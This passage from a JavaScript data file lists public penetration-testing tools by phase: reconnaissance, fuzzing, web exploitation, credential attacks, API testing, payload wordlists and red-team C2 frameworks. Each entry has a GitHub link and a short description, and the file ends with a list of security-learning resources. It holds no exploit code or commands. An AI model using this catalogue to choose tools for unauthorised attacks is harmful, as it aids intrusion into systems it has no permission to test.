    categoryLabel: 'Recon',
    desc: 'Mapping the target and gathering intel before anything active happens.',
    tools: [
      { name: 'theHarvester', url: 'https://github.com/laramies/theHarvester', desc: 'Aggregates emails, subdomains, and names from public sources.' },
      { name: 'SpiderFoot', url: 'https://github.com/smicallef/spiderfoot', desc: 'Automated OSINT reconnaissance across 200+ data sources.' },
      { name: 'Recon-ng', url: 'https://github.com/lanmaster53/recon-ng', desc: 'Modular web recon framework with a Metasploit-style workflow.' },
      { name: 'Sherlock', url: 'https://github.com/sherlock-project/sherlock', desc: 'Finds usernames across hundreds of social platforms.' },
      { name: 'subfinder', url: 'https://github.com/projectdiscovery/subfinder', desc: 'Fast passive subdomain enumeration from many public sources.' },
      { name: 'katana', url: 'https://github.com/projectdiscovery/katana', desc: 'Next-gen crawler with JavaScript-aware endpoint discovery.' },
    ],
  },
  {
    id: 'gh-scanning',
    name: 'Scanning & Fuzzing',
    category: 'scanning',
    categoryLabel: 'Scanning',
    desc: 'Active discovery of hosts, directories, parameters, and live surface area.',
    tools: [
      { name: 'ffuf', url: 'https://github.com/ffuf/ffuf', desc: 'Fast, flexible web fuzzer for directories, params, and vhosts.' },
      { name: 'gobuster', url: 'https://github.com/OJ/gobuster', desc: 'Directory, DNS, and vhost brute-forcing tool written in Go.' },
      { name: 'feroxbuster', url: 'https://github.com/epi052/feroxbuster', desc: 'Recursive content discovery that auto-explores found directories.' },
      { name: 'wfuzz', url: 'https://github.com/xmendez/wfuzz', desc: 'Versatile web application fuzzer for parameters and payload injection.' },
      { name: 'nuclei', url: 'https://github.com/projectdiscovery/nuclei', desc: 'Template-driven vulnerability scanner covering thousands of CVEs.' },
      { name: 'httpx', url: 'https://github.com/projectdiscovery/httpx', desc: 'Fast HTTP toolkit for probing, fingerprinting, and status checks.' },
      { name: 'nikto', url: 'https://github.com/sullo/nikto', desc: 'Classic web server scanner for outdated software and misconfigs.' },
    ],
  },
  {
    id: 'gh-exploit',
    name: 'Web Exploitation',
    category: 'exploit',
    categoryLabel: 'Exploitation',
    desc: 'Confirming and demonstrating impact for specific vulnerability classes.',
    tools: [
      { name: 'sqlmap', url: 'https://github.com/sqlmapproject/sqlmap', desc: 'The standard automated SQL injection detection and exploitation tool.' },
      { name: 'XSStrike', url: 'https://github.com/s0md3v/XSStrike', desc: 'Context-aware XSS detection engine with payload generation.' },
      { name: 'Dalfox', url: 'https://github.com/hahwul/dalfox', desc: 'Fast parameter-based XSS scanner built for pipelines.' },
      { name: 'commix', url: 'https://github.com/commixproject/commix', desc: 'Automated OS command injection detection and exploitation.' },
      { name: 'Corsy', url: 'https://github.com/s0md3v/Corsy', desc: 'CORS misconfiguration scanner.' },
      { name: 'Arjun', url: 'https://github.com/s0md3v/Arjun', desc: 'Hidden HTTP parameter discovery.' },
    ],
  },
  {
    id: 'gh-auth',
    name: 'Auth, Secrets & Recovery',
    category: 'auth',
    categoryLabel: 'Auth / Secrets',
    desc: 'Credential attacks, token abuse, and recovering data that leaked by accident.',
    tools: [
      { name: 'jwt_tool', url: 'https://github.com/ticarpi/jwt_tool', desc: 'Toolkit for validating, forging, and attacking JSON Web Tokens.' },
      { name: 'TruffleHog', url: 'https://github.com/trufflesecurity/trufflehog', desc: 'Finds hard-coded secrets across git history and filesystems.' },
      { name: 'GitTools', url: 'https://github.com/internetwache/GitTools', desc: 'Dump and inspect exposed .git repositories found on live sites.' },
      { name: 'THC-Hydra', url: 'https://github.com/vanhauser-thc/thc-hydra', desc: 'Fast network login brute-forcer covering dozens of protocols.' },
      { name: 'CeWL', url: 'https://github.com/digininja/CeWL', desc: 'Generates custom wordlists by spidering a target site.' },
    ],
  },
  {
    id: 'gh-cms-tls',
    name: 'CMS & TLS',
    category: 'cms',
    categoryLabel: 'CMS / TLS',
    desc: 'Platform-specific and transport-layer security testing.',
    tools: [
      { name: 'WPScan', url: 'https://github.com/wpscanteam/wpscan', desc: 'WordPress vulnerability, plugin, and user enumeration scanner.' },
      { name: 'testssl.sh', url: 'https://github.com/testssl/testssl.sh', desc: 'Checks TLS/SSL configuration, ciphers, and known protocol CVEs.' },
      { name: 'OWASP ZAP', url: 'https://github.com/zaproxy/zaproxy', desc: 'Full-featured intercepting proxy and automated scanner.' },
    ],
  },
  {
    id: 'gh-api',
    name: 'API Security',
    category: 'api',
    categoryLabel: 'API',
    desc: 'Testing GraphQL/REST APIs and confirming blind, out-of-band vulnerabilities.',
    tools: [
      { name: 'graphql-cop', url: 'https://github.com/dolevf/graphql-cop', desc: 'Automated security checks for common GraphQL misconfigurations.' },
      { name: 'Interactsh', url: 'https://github.com/projectdiscovery/interactsh', desc: 'Out-of-band interaction client for blind SSRF/XXE/SSTI confirmation.' },
    ],
  },
  {
    id: 'gh-wordlists',
    name: 'Wordlists & Payloads',
    category: 'wordlists',
    categoryLabel: 'Wordlists',
    desc: 'Reference payloads and wordlists that power most of the tools above.',
    tools: [
      { name: 'SecLists', url: 'https://github.com/danielmiessler/SecLists', desc: 'The definitive collection of wordlists for fuzzing, brute force, and discovery.' },
      { name: 'PayloadsAllTheThings', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings', desc: 'Payload and bypass reference for nearly every vulnerability class.' },
      { name: 'FuzzDB', url: 'https://github.com/fuzzdb-project/fuzzdb', desc: 'Attack patterns, predictable filenames, and malicious payload dictionaries.' },
    ],
  },
  {
    id: 'gh-c2',
    name: 'C2 / Red Team Frameworks',
    category: 'c2',
    categoryLabel: 'Red Team',
    desc: "Broader red-team command-and-control frameworks — beyond pure web testing, but common once a web foothold turns into a larger engagement.",
    tools: [
      { name: 'Sliver', url: 'https://github.com/BishopFox/sliver', desc: 'Open-source, cross-platform adversary emulation / C2 framework.' },
      { name: 'Havoc', url: 'https://github.com/HavocFramework/Havoc', desc: 'Modern, modular C2 framework built for red team operations.' },
      { name: 'Empire', url: 'https://github.com/BC-SECURITY/Empire', desc: 'Post-exploitation framework with PowerShell and Python agents.' },
      { name: 'Mythic', url: 'https://github.com/its-a-feature/Mythic', desc: 'Cross-platform, collaborative C2 framework with a plugin ecosystem.' },
    ],
  },
];

const GITHUB_TOOLS_CATEGORIES = [
  { id: 'all', label: 'All' },
  { id: 'recon', label: 'Recon' },
  { id: 'scanning', label: 'Scanning' },
  { id: 'exploit', label: 'Exploitation' },
  { id: 'auth', label: 'Auth / Secrets' },
  { id: 'cms', label: 'CMS / TLS' },
  { id: 'api', label: 'API' },
  { id: 'wordlists', label: 'Wordlists' },
  { id: 'c2', label: 'Red Team' },
];

const RESOURCES = [
  { name: 'OWASP Web Security Testing Guide', url: 'https://owasp.org/www-project-web-security-testing-guide/' },
  { name: 'OWASP Top 10 (2021)', url: 'https://owasp.org/Top10/' },
  { name: 'PortSwigger Web Security Academy', url: 'https://portswigger.net/web-security' },
  { name: 'PayloadsAllTheThings', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings' },
  { name: 'HackTricks', url: 'https://book.hacktricks.xyz/' },
];
